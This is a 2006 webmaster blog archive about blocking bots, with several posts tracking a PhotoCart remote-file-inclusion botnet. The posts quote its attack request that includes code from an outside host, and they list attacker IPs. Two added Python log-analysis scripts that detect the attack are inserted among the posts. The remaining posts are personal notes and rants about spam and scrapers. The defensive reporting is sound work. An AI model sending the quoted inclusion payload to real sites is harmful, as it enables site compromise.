Sunday, December 31, 2006

Complete Botnet List Used in PhotoCart Attack

This is probably a small botnet, with only 174 IPs involved in currently trying to infect a single website using the PhotoCart vulnerability. I decided to show just how far these people are willing to go in order to attempt bypassing possible firewall blocks, just to make sure one of them is successful.

Here's the complete botnet list:

I haven't fully processed this list yet, but 17 of these IPs are in blocks assigned to theplanet.com.

The thing I find most amusing here is that we hear so much about compromised home computers being involved in botnets, yet this batch, for the most part, appears to be primarily dedicated servers in data centers.

This just verifies what I've been preaching about blocking access to your server from data centers as they are a source of many problems from scrapers to hackers.

Saturday, December 30, 2006

PhotoCart vulnerability claims another website

UPDATE 12/31: It appears Softlayer took the server on IP 208.101.16.120 offline at this time. The PhotoCart attackers apparently aren't aware of this yet, because there is still an ongoing attack referencing empzone.com as I write this. At least it will do no harm to innocent sites at the moment. Thank you, Softlayer, for the prompt action.

The latest wave of PhotoCart vulnerability attacks just claimed a new website.

This time they claimed Husnaweb.com, someone's blog, as a victim.

I first notified the owner of Husnaweb and the data center Softlayer of the problem on 12/20. They promptly removed the file http://www.husnaweb.com/c.in from the server and the PhotoCart attacks stopped for a couple of days. Then the attacks started up again when the file showed up on the server again, so apparently Husnaweb was still vulnerable itself and being actively exploited.

I wrote back to the site owner and Softlayer again on 12/25, assuming they would deal with it eventually, it being a holiday, and today noticed they appear to have simply given up on the blog, as Husnaweb is gone and it's now a parked page on GoDaddy.

Today the attacks started up all over again using this page request:

"GET /PhotoCart/adminprint.php?path=http://empzone.com/c.ar?"

host empzone.com has address 208.101.16.120
host 208.101.16.120 -> 208.101.16.120-static.reverse.baserunner.net

whois 208.101.16.120

OrgName: SoftLayer Technologies Inc.
OrgID: SOFTL
Address: 1950 N Stemmons Freeway
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US

NetRange: 208.101.0.0 - 208.101.63.255

Looks like empzone.com will be their next victim, so I'm notifying data center Softlayer yet again that another Softlayer customer has been breached.

Anyone notice a trend here?

The other site I reported about, wnydir.com, was also a Softlayer customer.

host wnydir.com has address 208.101.16.120
host 208.101.16.120 -> 208.101.16.120-static.reverse.baserunner.net

The reverse DNS on the sites all points to baserunner.net, which says "Coming Soon", no contact information.

I must be getting slow in my old age: they're all on the same IP address, so it would appear that the server itself has been compromised.

Ah well, this makes my next letter to Softlayer a little different now doesn't it?
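As an added example (my code, not the author's), here is how a defender could pull the same two signals out of an access log that the PhotoCart posts rely on: the remote-file-inclusion indicator is a query parameter whose value is an absolute URL, exactly the shape of the adminprint.php?path=http://... request quoted above, and the results are aggregated per source IP and user agent the way the botnet list is, with sources inside known data-center netblocks marked. The log lines are constructed, the only netblock listed is the SoftLayer NetRange quoted in this post, and all function names are my own.

```python
"""Flag PhotoCart-style remote-file-inclusion (RFI) attempts in an Apache log.
The attack request quoted in the post, adminprint.php?path=http://..., passes
an absolute URL as a parameter.  This module spots that pattern, tallies the
hosts being pulled in, and marks sources inside known data-center netblocks."""
import re
from collections import Counter, defaultdict
from ipaddress import ip_address, ip_network
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value carrying one of these schemes asks the script to fetch remote code.
REMOTE_SCHEMES = {"http", "https", "ftp"}

# Data-center space.  Only the SoftLayer NetRange quoted in the post
# (208.101.0.0 - 208.101.63.255) is listed; a real deployment loads many more.
DATA_CENTER_RANGES = [ip_network("208.101.0.0/18")]

# Constructed sample lines, not real traffic: documentation IPs plus two
# constructed addresses inside the SoftLayer range above.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Dec/2006:10:00:01 -0800] "GET /PhotoCart/adminprint.php?path=http://empzone.com/c.ar? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.10 - - [30/Dec/2006:10:00:02 -0800] "GET /PhotoCart/adminprint.php?path=http://empzone.com/c.ar? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
208.101.16.50 - - [30/Dec/2006:10:00:03 -0800] "GET /PhotoCart/adminprint.php?path=http://example.net/c.in HTTP/1.0" 404 209 "-" "libwww-perl/5.65"
208.101.20.9 - - [30/Dec/2006:10:00:04 -0800] "GET /about.html HTTP/1.0" 200 1024 "-" "libwww-perl/5.79"
198.51.100.7 - - [30/Dec/2006:10:00:05 -0800] "GET /PhotoCart/adminprint.php?path=gallery/print.tpl HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (Windows NT 5.1)"
198.51.100.7 - - [30/Dec/2006:10:00:06 -0800] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 5.1)"
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_include_hosts(target):
    """Hosts named by URL-valued query parameters; non-empty means an RFI attempt."""
    hosts = []
    for values in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        for value in values:
            parts = urlsplit(value)
            if parts.scheme in REMOTE_SCHEMES and parts.netloc:
                hosts.append(parts.netloc.lower())
    return hosts


def in_blocked_ranges(ip, ranges=DATA_CENTER_RANGES):
    """True if the address falls inside any of the given netblocks."""
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in ranges)


def analyze(log_text, ranges=DATA_CENTER_RANGES):
    """Aggregate per source IP, and count which remote hosts are being included."""
    per_ip = defaultdict(
        lambda: {"requests": 0, "rfi": 0, "agents": set(), "data_center": False})
    include_hosts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # malformed line: skip rather than crash the whole run
        entry = per_ip[rec["ip"]]
        entry["requests"] += 1
        entry["agents"].add(rec["ua"])
        entry["data_center"] = in_blocked_ranges(rec["ip"], ranges)
        hosts = remote_include_hosts(rec["target"])
        if hosts:
            entry["rfi"] += 1
            include_hosts.update(hosts)
    return dict(per_ip), include_hosts


def verdict(entry):
    """Classify one source: live RFI attempts first, then plain data-center origin."""
    if entry["rfi"]:
        return "rfi-attempt"
    if entry["data_center"]:
        return "data-center"
    return "ok"


if __name__ == "__main__":
    per_ip, include_hosts = analyze(SAMPLE_LOG)
    for ip, e in sorted(per_ip.items(), key=lambda kv: -kv[1]["requests"]):
        agents = ", ".join(sorted(e["agents"]))
        print(f'{ip} requested {e["requests"]} pages as "{agents}" -> {verdict(e)}')
    print("include file hosts:", dict(include_hosts))
```

The include-host tally is the list a site owner would hand to the hosting company, as the author did for husnaweb.com and empzone.com; the per-IP verdicts are what a firewall rule would key on.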

Friday, December 29, 2006

The Zen of MP3 Part Deux Point Oh

Well, I was a bad boy and dropped my Zen micro one too many times. A few days ago I dropped the damn thing and it came up with a panic menu with options like FORMAT, REBOOT, and all sorts of goodies. Luckily a few minutes later it came back to life and ran for a couple of days more until, you guessed it, I dropped it again and it won't get past the failure menu.

DEAD.

It's really sad, you can hear the hard disk scraping when you put your ear to the Zen Micro, just sad.

Anyway, I ran out to Worst Buy the next day and got a replacement Zen and this time picked the black version of the 4GB Zen V Plus which is about half the size of the Zen Micro, has a color display, can show pictures and videos, quite a cute little toy. Didn't even have to install new software or a new USB cable as it works with my existing USB cable just fine. Uploaded all my MP3's and Yahoo Music and was back in action in no time.

For those of you about to ask why I didn't get an iPod, my wife has 2 of the fucking things and I hate using them. More than I loathe Apple and the crappy iPod interface, I loathe being locked into iTunes. They can take that proprietary shit and shove it which is why I also didn't get a Zune although they looked pretty cool. She didn't buy them either, they were gifts, so she's just stuck using them to be polite. FWIW, she picked my first Zen for me as a present so we all know what she prefers!

The new Zen V rocks!

It's not touch sensitive like the old Zen Micro and has mechanical switches and everything is flush to the case so it's damn near next to impossible to accidentally engage a command so I've not used the LOCK function yet.

The only downsides I've seen so far are that scrolling the list of All Tracks is slower than shit and, if your unit LOCKS UP, which mine did once while setting it up, the RESET button on the side needs tools that only a microbiologist would possess to depress that micro button. Word to the wise: keep a safety pin handy in case it locks up, because you can't open the back and remove the battery or anything useful like that; you're just fucked without micro-tools handy.

Since I was replacing the Zen it seemed a no brainer to treat myself with a pair of new headphones and got a set of Bose Triport headphones which are very nice. Not the most expensive Bose headphones out there, but they sound damn nice compared to the Sony headphones I was using.

Yes, the Bose are big but I hate earbuds.

Anyway, this time the Zen upgrade was completely painless and I'm a happy boy with a new toy.

Wednesday, December 27, 2006

Ho! Ho! Ho! I'm Baaaaack....

Went away for a few days to visit my Mom in Nevada for Christmas, a brief 5 hour drive, and surprisingly had very little separation anxiety from the computer, internet, blog or any of this crap. Maybe the free Wifi helped with the 'net separation anxiety but I digress.

Rented the usual suite at the Holiday Inn Express, which is by far the best hotel in that pit of a Nevada town. Got a nice 55" HDTV with a DVD player in the living room and a huge whirlpool tub in the bedroom. They have free WiFi of course, mentioned above, which I used sparingly just to keep an eye on my sites and make sure they were up and collecting coin.

Quite nice for the price.

Brought a couple of DVD's to watch at night, some bourbon for the whirlpool, and I was good to go.

Sadly, the cat had a crappy Christmas, as he had a traumatic moment right before we left. We were just about to head out to my mom’s place and, for reasons unknown, the cat decided to sit right between where my wife and I were standing fairly close together. Suddenly, my wife accidentally stepped on the cat's paw, at which point he screamed. She heard this noise and quickly turned around to see what was wrong with the cat, still standing on his paw and grinding it further into the carpet as she turned on it. The cat started hissing, spitting, screaming and flipping out.

She finally realized what was going on and took her foot off the cat, at which point there was one pissed off ball of flying fur running through the house. The cat, in typical cat fashion, was hiding under everything until I finally captured him 15 minutes later. Upon close inspection the cat turned out to be very upset but completely unhurt from being stepped upon.

Unfortunately, we had to leave while he was still bent out of shape and luckily for us he wasn’t holding a grudge and was happy to see us when we got back the next day.

Now the fun part of this short holiday vacation was the bad weather on the return trip.

Almost all the way back to Reno and beyond there were very high winds, 45 mph and higher, that were kicking up dust and sand storms, pelting my car with rocks, and there were huge tumbleweeds rolling all over the roads. One of the big tumbleweeds got pulverized by the SUV in front of my car and we got pelted with all the tumbleweed chunks. We managed to get past Reno right before a couple of 18 wheelers got blown over, one of them a Walmart truck according to the news.

If the wind, dust, rocks and tumbleweeds weren't bad enough, we had pouring rain west of Sacramento and the wind was still blowing hard, which caused a lot of traffic jams as the nervous drivers all started braking everywhere.

Took forever to get home...

Don't you just *LOVE* the holidays?

BAH! HUMBUG!

Friday, December 22, 2006

PhotoCart Attack Takes a Holiday

So far I've gotten 3 or 4 sites shut down or cleaned up where the botnet of PhotoCart attackers has been storing their include files. It's been quiet for a couple of days now since the last one was cleaned up, so I'm wondering if, who am I kidding, WHEN the attacks will start up again with a file referenced from yet another new location.

I didn't even bother posting about the last attack and domain they used as I got it cleaned up pretty quick and the source of the attack was pretty much the same.

So you PhotoCart hacking clowns, ready for me to shut down your next site or should we go after your botnet instead?

Come on, make my day...

First Look - SMBot 1.0 Crawls via Amazon Web Services

Maybe this is how Amazon responded to my tongue-in-cheek request to set the user agent on their crawler.

I have no clue why SpecificMedia would be attempting to crawl my site, or why they are coming from an Amazon IP address. Maybe it's possible that when you hire AWS for a specific task they just plug in the customer name as the UA. Perhaps Amazon just auctioned off the user agent to the highest bidder for some viral marketing thing, who knows.

Anyway, here are the IPs and the user agent seen crawling:

Just what we need, more crap crawling the web.

Joy.

Blog Pimps and Web Whores

When you have a new product or service and can't get anyone to write about it, what do you do?

You go to a Blog Pimp for help, that's what you do!

The Pimp will hook your ass up with some blogging Web Whore that will review your shit for a fee ranging from $40-$500. Let's get serious now people, if you have a really worthwhile opinion you can make a heck of a lot more than 40 freaking dollars. The most common amount on the high end seems to be around $100 which isn't bad if you can knock out several paid reviews a day.

The only problem I see with this scenario is that many people may get annoyed and stop reading your blog if every post, or every other post, becomes some paid fluff piece.

If you're a serious blogger and have spent a substantial amount of time building up your brand so that you can attract traditional advertisers then why in hell would you risk polluting your brand with paid posts?

The next thing you know the advertisers paying for the posts will insist on the comments for those posts being censored, or the blogger will censor them by default just in the hopes of appeasing the advertiser and getting more paid post work in the future.

The problem with being a paid Web Whore is that you start down that slippery slope of selling your soul to the highest bidder, and your blog suddenly really isn't your blog anymore and you'll feel stifled in your own creation.

Good luck with those paid posts and let me know how selling out works for you all.

P.S. Just for giggles I browsed some of the blogs listed and this site ranked as high as some of the sites asking for $100 per review, which is really sad. Caveat Emptor.

Wednesday, December 20, 2006

SEM Nightmare - Yahoo Thinks I'm a Typo

UPDATE: Thanks to help from Danny Sullivan getting in touch with Tim Mayer over at Yahoo, this has been fixed.

Here's a recent and strange twist in the ever changing Yahoo landscape, I'm a typo.

That's right, and this must've happened just recently too: searching for INCREDIBILL shows results for INCREDIBLE instead of what I actually typed, but I still show up at #10. Those poor folks at Incredibill.com, the billing company, aren't even in the top 100. Now change the search to use quotes and search for "INCREDIBILL" and you get the results that I expected in the first place, and that billing company shows up at #6.

I have to ask WTF is up with this shit?

Did I accidentally piss in someone's cornflakes at Yahoo and get a handjob in the search engine to make sure people can't find my tirades that may occasionally point out some flaws in Yahoo?

Maybe they just decided they know best about what you wanted to find regardless of what you typed and decided to give us all a big corporate dose of "WE'RE SMARTER SO FUCK YOU!" with the search results.

Now the SEM implications here are huge as brand names are never dictionary words and Yahoo making assumptions about what you MIGHT want based on the nearest actual word in the dictionary is a potentially nasty turn of events.

Anyone else notice any obviously bizarre results lately for certain searches?

Let's compare notes...

Tuesday, December 19, 2006

Heads Up! Here comes Attributor

There's something new on the horizon in the rash of copyright protection services called Attributor that announced major VC funding yesterday. The WSJ ran a piece about how Attributor will scan the web for violations, and noted the founders are ex-Yahooligans.

Did a quick look at Attributor and they seem to be on the Yahoo backbone, which is interesting.

host attributor.com
attributor.com has address 68.142.234.103
attributor.com has address 68.142.234.104
attributor.com has address 68.142.234.105
attributor.com has address 68.142.234.106
attributor.com has address 68.142.234.76
attributor.com has address 68.142.234.77

host 68.142.234.103
103.234.142.68.in-addr.arpa domain name pointer p3w10.geo.re2.yahoo.com.

host 68.142.234.104
104.234.142.68.in-addr.arpa domain name pointer p3w11.geo.re2.yahoo.com.

host 68.142.234.77
77.234.142.68.in-addr.arpa domain name pointer p3w9.geo.re2.yahoo.com.

whois 68.142.234.77

OrgName: Inktomi Corporation
OrgID: INKT
Address: 701 First Ave
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US

NetRange: 68.142.192.0 - 68.142.255.255

Didn't notice anything obvious crawling from that range in my blocked bots log, but it's possible I let them slide because they are within the Yahoo/Inktomi range; will need to check that out.

However, the WSJ article did mention that they have "...begun testing a system to scan the billions of pages on the Web..." and that "The company says it will have over 10 billion Web pages in its index before the end of this month." I find it hard to believe they crawled that on their own completely unnoticed unless they are sharing Yahoo's cache.

No clue at the moment, but keep an eye out for whatever this is.

Let the Yahoo IP address hysteria start in 5... 4... 3... 2....

Blog Tag - 5 Things You Don't Want To Know About IncrediBILL

I got tagged by SpamHuntress and Skore in the ongoing game of blog tag, maybe others tagged me, who knows.

Anyway, here goes with 5 things you don't know about me:

  1. Once upon a time I was a budding musician that played both soprano and bass clarinet in the St Joseph, MO Municipal Band playing Big Band music and Show Tunes. Also played a fair amount of classical in the Missouri Western State University's college symphony. However, I threw in the towel on tooting a horn when the computer bug bit me hard and it turned into a full-time career.
  2. After taking 4 whole years of French in high school, 15 years later I spent 3 whole days in Paris. Now the irony is I didn't take typing in HS and took French instead, yet now spend all day every day typing at the computer and rarely ever speak French.
  3. Paintball is one of my favorite hobbies and I will shoot your ass where you stand and giggle with glee at your new found pain.
  4. I roller skate! Even backwards and sideways! We're talking about the REAL 4 wheel skates, none of that pansy ass inline skating crap.
  5. I love playing cards on Pogo.com and you can often catch me there as "IncrediBILL_" playing Spades, Hearts, Gin, Canasta, Cribbage, etc. Bring your A-game if you look me up for a game or two as I'm a fierce competitor in cards, just ask my wife who I frequently trounce ;)

Now let's tag 5 people that might be interesting like Martinibuster, John Andrews, Willmacc, Phil Maher and Aaron Pratt.

Something Squirrelly Tried to Grab-My-Site

Caught something attempting to speed through my site with downloading on the agenda:

209.253.35.226 [bscop.bluesquirrel.com.] requested 340 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1.)"
Went to Blue Squirrel's site to see what they were and big surprise they have some website downloading tools like Grab-a-site and WebWhacker.

Here's my favorite part where the Grab-a-site software's options default to stealth mode:
User Agent - Lets you set how Grab-a-Site reports itself to the web servers. By default, it sends "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1.)" which makes it look like an Internet Explorer version 6.0.
This product may be responsible for some of the stealth activity we see in our log files, and it's obviously trying to hide from webmasters; otherwise the default UA would be the name of the product and not MSIE 6.0. Since the UA string is whatever the client chooses to send, the 340 pages pulled in one visit are the real giveaway here, not the browser name.

Saturday, December 16, 2006

Compromised Within My Own Data Center

Today was interesting as I noticed a couple of servers within my own data center taking aim at my servers. One IP address was attempting a bazillion user names and passwords on SSH and the other IP address was scanning pages on the web server. Now scanning pages on the web server isn't such a big deal, but when I went to look at the server and see who they were, it attempted to inject a virus into my computer using a browser vulnerability.

Just finished reporting both incidents to the support staff at the hosting company and we'll wait and see how they respond. If they leave the virus injecting server online I will probably have to take my business elsewhere as that's just not cool, and of course everyone will find out who they are and what they said at that point.

Now we wait...

Friday, December 15, 2006

New Crawling From EV1Servers

No clue what this is or who it's related to yet, but it's definitely a bot of some sort doing a crawl distributed over a d-block (the whole 209.85.54.x range) at EV1. Since it came from their data center it was already blocked and fed breadcrumb pages to see where the data shows up, if ever.

Here's the alarm it set off...

PROXIMITY ALERT!
209.85.54. [ev1s-209-85-54-130.ev1servers.net.]

209.85.54.130 pages 6- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.132 pages 4- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.134 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.135 pages 5- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.137 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.138 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.139 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.140 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.143 pages 1- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.146 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Now we just sit back and watch to see where this info pops up, as it could always be just a data mining operation which never shows up in any index.
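The two patterns above, a "browser" that pulls hundreds of pages in one visit and a crawl spread across a block of neighbouring addresses, can both be pulled out of the per-IP summary lines this blog prints. The following Python is an added example, not the blog's own tooling: it parses lines in the `IP [rdns] requested N pages as "UA"` form, groups hosts by /24 and user agent to raise the proximity alert, and flags browser-claimed UAs whose page count is far beyond what a person reads. The sample lines are copied from the log excerpts on this page; reverse DNS for the .132 to .135 hosts is not given on the page, so it is shown as unknown, and the thresholds (3 hosts per block, 200 pages) are assumptions to tune for your own site.

```python
import re
import ipaddress
from collections import defaultdict

# Per-IP summary lines in the form this blog prints them:
#   IP [reverse-dns] requested N pages as "User-Agent"
LINE_RE = re.compile(
    r'^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \[(?P<rdns>[^\]]*)\] '
    r'requested (?P<pages>\d+) pages? as "(?P<ua>[^"]*)"$'
)

# Library / tool user agents seen in the posts on this page.
TOOL_UA_RE = re.compile(r'^(?:libwww-perl|lwp-trivial)/', re.I)
# Anything that claims to be a browser.
BROWSER_UA_RE = re.compile(r'^Mozilla/')

# Constructed sample: lines copied from this page's log excerpts. Reverse DNS
# for the .132-.135 hosts is not on the page, so it is shown as unknown.
SAMPLE_LINES = """\
209.253.35.226 [bscop.bluesquirrel.com.] requested 340 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1.)"
209.85.54.130 [ev1s-209-85-54-130.ev1servers.net.] requested 6 pages as "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
209.85.54.132 [unknown] requested 4 pages as "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
209.85.54.134 [unknown] requested 2 pages as "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
209.85.54.135 [unknown] requested 5 pages as "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 86 pages as "libwww-perl/5.805"
66.199.247.42 [unknown] requested 12 pages as "lwp-trivial/1.41"
"""


def parse_lines(text):
    """Parse summary lines; silently skip anything that does not fit the format."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append({"ip": m["ip"], "rdns": m["rdns"],
                            "pages": int(m["pages"]), "ua": m["ua"]})
    return entries


def proximity_alerts(entries, min_hosts=3):
    """Group hosts by /24 and user agent.

    Several distinct hosts in one /24 presenting the identical UA is the
    'PROXIMITY ALERT' pattern: one crawl spread over a block of addresses.
    """
    groups = defaultdict(set)
    for e in entries:
        net = ipaddress.ip_network(f"{e['ip']}/24", strict=False)
        groups[(str(net), e["ua"])].add(e["ip"])
    alerts = [{"net": net, "ua": ua, "ips": sorted(ips, key=ipaddress.ip_address)}
              for (net, ua), ips in groups.items() if len(ips) >= min_hosts]
    return sorted(alerts, key=lambda a: a["net"])


def suspicious_browsers(entries, max_pages=200):
    """Hosts claiming a browser UA but pulling far more pages than a person reads.

    The UA string is chosen by the client, so page volume, not the UA, is the
    reliable signal for site-downloader tools that default to an MSIE string.
    """
    return [e["ip"] for e in entries
            if BROWSER_UA_RE.match(e["ua"]) and e["pages"] > max_pages]


def tool_agents(entries):
    """Hosts that do not even bother to hide: library UAs such as libwww-perl."""
    return sorted({e["ip"] for e in entries if TOOL_UA_RE.match(e["ua"])},
                  key=ipaddress.ip_address)


if __name__ == "__main__":
    parsed = parse_lines(SAMPLE_LINES)
    for alert in proximity_alerts(parsed):
        print(f"PROXIMITY ALERT {alert['net']} x{len(alert['ips'])} {alert['ua']}")
    print("downloaders posing as browsers:", suspicious_browsers(parsed))
    print("library user agents:", tool_agents(parsed))
```

Run against the sample it raises one proximity alert for 209.85.54.0/24 with four hosts, lists the Blue Squirrel address as a downloader posing as a browser, and lists the two library user agents. The /24 grouping is deliberately coarse; a hosting provider's block will also contain innocent customers, so treat an alert as a reason to serve breadcrumb pages and watch, as the post does, rather than as proof by itself.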

Thursday, December 14, 2006

Next Wave PhotoCart Attack With New Domain

These assholes just don't stop trying this PhotoCart vulnerability; it's quite idiotic since it didn't work the last few thousand times they hit my site.

They have a new domain:

http://www.wnydir.com/c.in
Which currently proclaims:
Bandwidth Limit Exceeded The server is temporarily unable to service your request due to the site owner reaching his/her bandwidth limit. Please try again later.
Keep an eye on it, probably will be back up later or tomorrow, who knows.

These botnet guys obviously aren't the smartest tacks on the cork board, picking a domain with throttled bandwidth to work from, but it's probably a hacked site, and now that poor customer has no clue he's offline due to vandalism.

Here's the list of attackers so far today:
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 86 pages as "libwww-perl/5.805"
70.86.151.130 [82.97.5646.static.theplanet.com.] requested 45 pages as "libwww-perl/5.65"
66.254.98.142 [angels.reflected.net.] requested 39 pages as "libwww-perl/5.803"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 42 pages as "libwww-perl/5.801"
67.19.65.132 [84.41.1343.static.theplanet.com.] requested 41 pages as "libwww-perl/5.805"
64.8.114.12 [64-8-114-12.yourhostingprovider.net.] requested 43 pages as "libwww-perl/5.801"
69.56.180.222 [de.b4.3845.static.theplanet.com.] requested 27 pages as "libwww-perl/5.805"
85.214.19.18 [copyworld-kiel.de.] requested 53 pages as "libwww-perl/5.69"
195.242.211.253 [faq.ecobike.de.] requested 17 pages as "libwww-perl/5.48"
67.159.26.99 [.] requested 2 pages as "libwww-perl/5.805"
140.117.73.1 [finance.nsysu.edu.tw.] requested 41 pages as "libwww-perl/5.805"
203.194.134.166 [unknown] requested 37 pages as "libwww-perl/5.65"
66.103.152.111 [server22.internet-hosting-services.com.] requested 50 pages as "libwww-perl/5.805"
81.181.89.42 [cipnet.is.ew.ro.] requested 38 pages as "libwww-perl/5.805"
64.8.114.14 [web-06.ihservers.com.] requested 65 pages as "libwww-perl/5.801"
62.4.70.180 [62.4.70.180.fantasyvirtual.com.] requested 42 pages as "libwww-perl/5.803"
203.146.140.221 [besthost5.com.] requested 29 pages as "libwww-perl/5.64"
207.158.61.3 [ns1.control8.com.] requested 45 pages as "libwww-perl/5.79"
81.169.186.195 [moncserver.de.] requested 52 pages as "libwww-perl/5.803"
203.167.88.76 [unknown] requested 29 pages as "libwww-perl/5.65"
62.221.213.68 [unknown] requested 14 pages as "libwww-perl/5.65"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 28 pages as "libwww-perl/5.801"
189.146.75.42 [dsl-189-146-75-42.prod-infinitum.com.mx.] requested 19 pages as "libwww-perl/5.803"
81.183.219.157 [dsl51B7DB9D.fixip.t-online.hu.] requested 14 pages as "libwww-perl/5.803"
I wonder what compromised site they'll be using tomorrow?

Spam Kiting?

Someone I know just wrote an article about domain kiting and how he used to get domains for 5 days for free as long as you canceled them within 5 days. This triggered a memory, as I remember writing about some spammers that were trying to bombard me with links to domains that didn't even exist yet, not registered to be exact. Then the domains became active suddenly to reap the rewards of the previous blog spamming, and most of them tended to vanish within a few days.

With all of this information inside my head it collided and bubba had a thought...

SPAM KITING!

Makes perfect sense too since many spammer domains get whacked in a couple of days as people complain to the web host.

So why not just use a domain for 5 days for free and cancel it?

You get rewarded for spamming for a bunch of domains you got completely for FREE and you don't get stuck holding the bag with a bunch of useless blacklisted domains most likely in a Google penalty box at that point.

Now a truly evil genius [looks in mirror] would write a script that checks to see if the domains in the attempted spams are registered and registers them if they don't exist, then cancels them all 5 days later automatically. That way, the site being abused by the spam could take advantage of the spammers' efforts, and there is no connection between the spammer and the domain name except the existence of the spam linking to the domain.

I need to check my logs and see if the idiots that used to spam me with unregistered domains are still hard at work as I see some fun to be had!

Another Made For AdSense Scraper Linked to Umax Link Spammer

Another one of the Made For AdSense sites got caught in my snare and, sure enough, this one was also tied to a huge list of MFA sites and some porn spam sites as well.

Check this out:

http://www.digitbytes.com/
Did a little more research on the source of this scraping:
IP Address: 66.199.247.42
User Agent: lwp-trivial/1.41
It sounded familiar and, sure enough, it's the same IP address as a previous scraper I wrote about from umax-ppc.net (66.199.247.42), which previously had some virus injection stuff on their server; I didn't check this time, so beware.

Same IP as before, same user agent, still operating from the same location where they were previously hosting sites that injected a virus. It's simply amazing that this stuff is allowed to continue to operate within US data centers, or any data centers for that matter, as it's obvious the hosting companies are more concerned about their bottom line than their reputations or these guys wouldn't have a host.

I used this cool tool to get a list of all the link spam domains currently hosted on that server and it's a staggering list.
Found 730 websites with the IP 66.199.247.42

1) 1.top-10-shop.com
2) 1.yula.name
3) 100-inch.lcd.tv.1day.us
4) 12yo.umax-search.info
5) 1day.us
6) 2005.freeyaho.com
7) 2006.adsname.com
8) 2006.baikal-info.com
9) 2006.dimattic.com
10) 2006.freeyaho.com
11) 2006.hotel-baikal.info
12) 2006.online-info.info
13) 2006.you.freeyaho.com
14) 3.top-10-shop.com
15) 66.199.247.42
16) 8.freeyaho.com
17) a.adsname.com
18) a.freeyaho.com
19) abc-news.free-hit.com
20) academy-award-nominees.ppc-se.net
21) academy-awards.adsname.com
22) acoustic-guitar.1day.us
23) adawere.seblog.name
24) administration.specific911.biz
25) adoption.seblog.name
26) adsname.com
27) adult-gaming.umaxsearch-se.com
28) adultcheck.seblog.name
29) affiliate-books.com
30) air-compressor.seblog.name
31) alberta.ppc-se.com
32) alfred.top-10-shop.com
33) almond-trees.specific911.biz
34) american-immigration.keywords-blog.com
35) analysis.umax-search.info
36) and.1day.name
37) and.dimattic.com
38) and.freeyaho.com
39) and.online-info.info
40) and.rates.the.2006.1day.name
41) and.sampleclip.net
42) and.suggestions.and.real.the.2006.1day.name
43) and.umaxppc.com
44) and.umaxppcsearch.com
45) and.umaxse.net
46) and.webmasterdiscuss.com
47) angels.seblog.name
48) animals.seblog.name
49) anniversary-presents.seblog.name
50) anti-war.online-info.info
51) antiques.seblog.name
52) appraisal.ppc-se.net
53) architecture-record.seblog.name
54) army-tshirts.seblog.name
55) aroma.seblog.name
56) arshan.info
57) art-software.seblog.name
58) art-xxx.com
59) as-seen-on-tv.seblog.name
60) at.the.porn-teen-pic.com
61) auction.seblog.name
62) aussenputz.hockey.seblog.us
63) automotive-information-center.seblog.name
64) babe.seblog.name
65) baby-stroller.top-new-affiliate-programs.com
66) back-pack.seblog.name
67) baikal-hotel.com
68) baikal-info.com
69) baikal-shop.com
70) baikalguide.com
71) baikalsk.com
72) baikalsk.info
73) baikalsk.net
74) bankrupcy.seblog.name
75) baseball-betting-line.seblog.name
76) beach-cruisers.seblog.name
77) beach.top-10-shop.com
78) beaches.weekly-teens.com
79) bermuda-travel.seblog.name
80) best.freeyaho.com
81) best.ppc-se.net
82) best.top-10-shop.com
83) bet-and-win.seblog.name
84) beta-news.board-online.com
85) bicycle-catalog.seblog.name
86) bicycle-classified.seblog.name
87) bicycle-rating.seblog.name
88) bicycle-ratings.seblog.name
89) bicycle-safety.seblog.name
90) bicycle-sizing.seblog.name
91) bifocal-lens.seblog.name
92) bike-helmets.seblog.name
93) bike-sales.seblog.name
94) bikes-cruisers.seblog.name
95) bikini.seblog.name
96) bioresearch.online-info.info
